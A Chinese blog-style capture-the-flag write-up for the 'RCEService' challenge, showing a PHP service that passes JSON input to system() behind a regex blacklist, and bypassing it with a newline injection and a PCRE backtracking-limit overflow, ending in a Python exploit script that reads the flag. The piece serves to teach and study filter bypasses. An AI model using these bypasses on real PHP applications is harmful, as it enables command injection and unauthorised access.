PHP正则表达式之RCEService回溯


Posted in PHP onApril 11, 2022

PHP正则表达式之RCEService回溯

打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了

<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];
    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}
?>

看到最后的system以及正则,看来这题是要绕过正则执行cmd命令了,这么多黑名单函数应该不会让我们找漏网之鱼吧,不会吧不会吧

我们看到正则表达式没有添加修饰符,那我们可以利用多行匹配这个漏洞了

PHP正则表达式之RCEService回溯

 在这里我们可以利用%0a换行符进行绕过正则匹配,而且可以看到要有修饰符s才会让.*匹配换行符,因此我们这里可以利用我们之前的ls试试能不能成功

PHP正则表达式之RCEService回溯

发现依然可以出来index.php;源代码中编译了环境变量path(我以为只是单纯暗示我们这个目录),我们就在那个目录下看看 

PHP正则表达式之RCEService回溯

发现了flag文件,我用nl,cat,more,less等命令都读取不出来 ,查资料发现,系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令

因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面

PHP正则表达式之RCEService回溯

 第二种办法也就是正则表达式回溯过多导致false,说实话我还是第一次听到正则的回溯问题

PHP利用PCRE回溯次数限制绕过某些安全限制

简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了,导致表达式后面的式子没有地方匹配,因此一个一个字符吐出来,直到后面的式子全部匹配完毕或者回溯次数过多

例子

PHP正则表达式之RCEService回溯

PHP正则表达式之RCEService回溯

 经过自己试试果然只能回溯一百万次

'/^.*

正则表达式最前面的匹配字符,^代表首个字母,'.'代表除换行符之外的所有字符,*代表前面那个表达式重复执行多次,因此他这里直接把我们的payload全部匹配完毕,导致后面的匹配不到字符了,只能一个个回溯

PHP正则表达式之RCEService回溯

再将后面的匹配一下字符,可以发现目前写的小写字母都没有过滤掉,因为十六进制\x00-\x1f换算成十进制并没有到小写字母的ascii值那个地方,因此我们可以任意利用一个小写字母×个一百万次,就可以让正则表达式直接失败

PHP正则表达式之RCEService回溯

import requests
url='http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)

Tags in this post...

PHP 相关文章推荐
PHP调用Linux的命令行执行文件压缩命令
Jan 27 PHP
Zend Studio 实用快捷键一览表(精心整理)
Aug 10 PHP
开源php中文分词系统SCWS安装和使用实例
Apr 11 PHP
PHP+memcache实现消息队列案例分享
May 21 PHP
PHP IDE PHPStorm配置支持友好Laravel代码提示方法
May 12 PHP
PHP调试的强悍利器之PHPDBG
Feb 22 PHP
php mysql实现mysql_select_db选择数据库
Dec 30 PHP
php获取目录中所有文件名及判断文件与目录的简单方法
Mar 04 PHP
详细解读php的命名空间(二)
Feb 21 PHP
PHP通过bypass disable functions执行系统命令的方法汇总
May 02 PHP
PHP 模拟登陆功能实例详解
Sep 10 PHP
Thinkphp框架使用list_to_tree 实现无限级分类列出所有节点示例
Apr 04 PHP
微信小程序结合ThinkPHP5授权登陆后获取手机号
PHP遍历数组的6种方式总结
Nov 17 #PHP
关于PHP数组迭代器的使用方法实例
php双向队列实例讲解
Nov 17 #PHP
如何解决php-fpm启动不了问题
Nov 17 #PHP
一次项目中Thinkphp绕过禁用函数的实战记录
php修改word的实例方法
Nov 17 #PHP
You might like
zf框架db类的分页示例分享
2014/03/14 PHP
php获取文章上一页与下一页的方法
2014/12/01 PHP
php中session_id()函数详细介绍,会话id生成过程及session id长度
2015/09/23 PHP
php操纵mysqli数据库的实现方法
2016/09/18 PHP
php进程(线程)通信基础之System V共享内存简单实例分析
2019/11/09 PHP
jQuery 学习第六课 实现一个Ajax的TreeView
2010/05/17 Javascript
js之事件冒泡和事件捕获详细介绍
2013/10/28 Javascript
推荐8款jQuery轻量级树形Tree插件
2014/11/12 Javascript
Javascript 赋值机制详解
2014/11/23 Javascript
jQuery中hide()方法用法实例
2014/12/24 Javascript
jQuery使用hide方法隐藏元素自身用法实例
2015/03/30 Javascript
jquery实现简单的表单验证
2015/11/17 Javascript
Angularjs中使用Filters详解
2016/03/11 Javascript
js智能获取浏览器版本UA信息的方法
2016/08/08 Javascript
jquery无法为动态生成的元素添加点击事件的解决方法(推荐)
2016/12/26 Javascript
BootStrapValidator初使用教程详解
2017/02/10 Javascript
基于JavaScript实现验证码功能
2017/04/01 Javascript
最全的JavaScript开发工具列表 总有一款适合你
2017/06/29 Javascript
Angular.js组件之input mask对input输入进行格式化详解
2017/07/10 Javascript
jquery.tagsinput.js实现记录checkbox勾选的顺序
2019/09/21 jQuery
vue中使用极验验证码的方法(附demo)
2019/12/04 Javascript
微信小程序跨页面数据传递事件响应实现过程解析
2019/12/19 Javascript
JS document对象简单用法完整示例
2020/01/14 Javascript
Python求解平方根的方法
2015/03/11 Python
Python的字典和列表的使用中一些需要注意的地方
2015/04/24 Python
python实现批量修改图片格式和尺寸
2018/06/07 Python
由面试题加深对Django的认识理解
2019/07/19 Python
详解python中的index函数用法
2019/08/06 Python
python操作docx写入内容,并控制文本的字体颜色
2020/02/13 Python
如何学习Python time模块
2020/06/03 Python
大学生职业生涯规划范文
2013/12/31 职场文书
结婚周年感言
2014/02/24 职场文书
汽车销售员工作总结
2015/08/12 职场文书
2016预备党员培训心得体会
2016/01/08 职场文书
七年级之开学家长寄语35句
2019/09/05 职场文书
只需要100行Python代码就可以实现的贪吃蛇小游戏
2021/05/27 Python